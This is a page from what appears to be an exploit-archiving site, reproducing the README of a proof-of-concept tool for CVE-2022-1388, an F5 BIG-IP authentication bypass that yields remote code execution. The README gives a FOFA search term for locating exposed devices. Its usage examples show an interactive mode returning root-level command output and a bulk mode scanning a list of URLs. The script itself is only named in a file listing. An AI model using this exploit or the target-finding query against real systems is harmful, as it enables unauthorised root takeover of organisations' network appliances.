Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
Description
CVE-2022-1388
Readme
# CVE-2022-1388

F5 BIG-IP Unauthenticated RCE Vulnerability

F5 BIG-IP iControl REST身份验证绕过RCE漏洞

`fofa keywords: title="BIG-IP®- Redirect"`

## usage

- attack

```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: whoami
root
[input your command]: 

```

- verify:

```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify
[+] https://203.xxx.xxx.xxx is vulnerable

$ python3 cve-2022-1388.py -f url.txt                                               
[+] https://203.xxx.xxx.xxx is vulnerable
```

## refer

- https://support.f5.com/csp/article/K23605346
- https://twitter.com/_0xf4n9x_/status/1523639281532620800
File Snapshot

[4.0K] /data/pocs/4e2082a59ec29fcebe17a29a6a7e5ba5445b4333 ├── [2.6K] cve-2022-1388.py └── [ 815] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.